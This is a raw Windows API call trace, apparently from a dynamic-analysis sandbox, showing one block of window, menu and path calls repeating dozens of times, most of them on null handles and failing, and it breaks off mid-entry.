[0176.325] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.325] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.325] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.325] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.325] GetMenu (hWnd=0x0) returned 0x0 [0176.325] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.325] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.325] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.325] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.325] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.325] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.325] GetStockObject (i=6) returned 0x1b00018 [0176.326] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.326] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.326] PathFileExistsW (pszPath=0x0) returned 0 [0176.326] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.326] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.326] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.326] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.326] GetMenu (hWnd=0x0) returned 0x0 [0176.326] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.326] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.326] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.326] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.326] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.326] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.326] GetStockObject (i=6) returned 0x1b00018 [0176.326] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.326] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.326] PathFileExistsW (pszPath=0x0) returned 0 [0176.326] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.326] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.326] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.326] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.326] GetMenu (hWnd=0x0) returned 0x0 [0176.326] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.326] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.326] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.326] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.326] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.326] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.326] GetStockObject (i=6) returned 0x1b00018 [0176.326] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.326] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.326] PathFileExistsW (pszPath=0x0) returned 0 [0176.326] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.326] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.327] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.327] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.327] GetMenu (hWnd=0x0) returned 0x0 [0176.327] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xb9) returned -1 [0176.327] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.327] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.327] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.327] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.327] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.327] GetStockObject (i=6) returned 0x1b00018 [0176.327] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.327] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.327] PathFileExistsW (pszPath=0x0) returned 0 [0176.327] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.327] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.327] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.327] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.327] GetMenu (hWnd=0x0) returned 0x0 [0176.327] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.327] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.327] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.327] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.327] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.327] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.327] GetStockObject (i=6) returned 0x1b00018 [0176.327] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.327] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.327] PathFileExistsW (pszPath=0x0) returned 0 [0176.327] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.327] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.327] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.327] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.327] GetMenu (hWnd=0x0) returned 0x0 [0176.327] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.327] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.328] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.328] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.328] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.328] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.328] GetStockObject (i=6) returned 0x1b00018 [0176.328] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.328] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.328] PathFileExistsW (pszPath=0x0) returned 0 [0176.328] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.328] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.328] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.328] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.328] GetMenu (hWnd=0x0) returned 0x0 [0176.328] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.328] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.328] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.328] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.328] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.328] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.328] GetStockObject (i=6) returned 0x1b00018 [0176.328] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.328] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.328] PathFileExistsW (pszPath=0x0) returned 0 [0176.328] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.328] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.328] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.328] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.328] GetMenu (hWnd=0x0) returned 0x0 [0176.328] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x355) returned -1 [0176.328] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.328] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.328] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.328] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.328] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.329] GetStockObject (i=6) returned 0x1b00018 [0176.329] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.329] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.329] PathFileExistsW (pszPath=0x0) returned 0 [0176.329] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.329] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.329] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.329] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.329] GetMenu (hWnd=0x0) returned 0x0 [0176.329] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x44f) returned -1 [0176.329] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.329] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.329] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.329] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.329] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.329] GetStockObject (i=6) returned 0x1b00018 [0176.329] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.329] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.329] PathFileExistsW (pszPath=0x0) returned 0 [0176.329] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.329] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.329] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.329] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.329] GetMenu (hWnd=0x0) returned 0x0 [0176.329] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.329] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.329] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.329] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.329] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.329] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.329] GetStockObject (i=6) returned 0x1b00018 [0176.329] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.329] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.329] PathFileExistsW (pszPath=0x0) returned 0 [0176.329] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.330] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.330] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.330] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.330] GetMenu (hWnd=0x0) returned 0x0 [0176.330] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.330] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.330] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.330] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.330] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.330] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.330] GetStockObject (i=6) returned 0x1b00018 [0176.330] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.330] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.330] PathFileExistsW (pszPath=0x0) returned 0 [0176.330] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.330] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.330] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.330] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.330] GetMenu (hWnd=0x0) returned 0x0 [0176.330] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.330] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.330] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.330] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.330] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.330] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.330] GetStockObject (i=6) returned 0x1b00018 [0176.330] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.330] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.330] PathFileExistsW (pszPath=0x0) returned 0 [0176.330] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.330] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.330] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.330] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.330] GetMenu (hWnd=0x0) returned 0x0 [0176.330] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.331] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.331] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.331] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.331] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.331] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.331] GetStockObject (i=6) returned 0x1b00018 [0176.331] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.331] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.331] PathFileExistsW (pszPath=0x0) returned 0 [0176.331] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.331] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.331] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.331] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.331] GetMenu (hWnd=0x0) returned 0x0 [0176.331] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x557) returned -1 [0176.331] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.331] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.331] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.331] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.331] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.331] GetStockObject (i=6) returned 0x1b00018 [0176.331] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.331] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.331] PathFileExistsW (pszPath=0x0) returned 0 [0176.331] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.331] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.331] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.331] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.331] GetMenu (hWnd=0x0) returned 0x0 [0176.331] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.331] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.331] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.331] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.331] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.331] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.331] GetStockObject (i=6) returned 0x1b00018 [0176.332] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.332] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.332] PathFileExistsW (pszPath=0x0) returned 0 [0176.332] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.332] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.332] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.332] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.332] GetMenu (hWnd=0x0) returned 0x0 [0176.332] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.332] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.332] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.332] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.332] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.332] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.332] GetStockObject (i=6) returned 0x1b00018 [0176.332] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.332] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.332] PathFileExistsW (pszPath=0x0) returned 0 [0176.332] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.332] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.332] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.332] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.332] GetMenu (hWnd=0x0) returned 0x0 [0176.332] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.332] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.332] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.332] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.332] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.332] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.332] GetStockObject (i=6) returned 0x1b00018 [0176.332] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.332] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.332] PathFileExistsW (pszPath=0x0) returned 0 [0176.332] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.333] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.333] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.333] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.333] GetMenu (hWnd=0x0) returned 0x0 [0176.333] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.333] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.333] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.333] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.333] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.333] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.333] GetStockObject (i=6) returned 0x1b00018 [0176.333] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.333] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.333] PathFileExistsW (pszPath=0x0) returned 0 [0176.333] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.333] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.333] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.333] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.333] GetMenu (hWnd=0x0) returned 0x0 [0176.333] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x182) returned -1 [0176.333] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.333] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.333] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.333] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.333] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.333] GetStockObject (i=6) returned 0x1b00018 [0176.333] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.333] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.333] PathFileExistsW (pszPath=0x0) returned 0 [0176.333] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.333] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.333] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.333] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.333] GetMenu (hWnd=0x0) returned 0x0 [0176.333] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.334] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.334] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.334] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.334] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.334] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.334] GetStockObject (i=6) returned 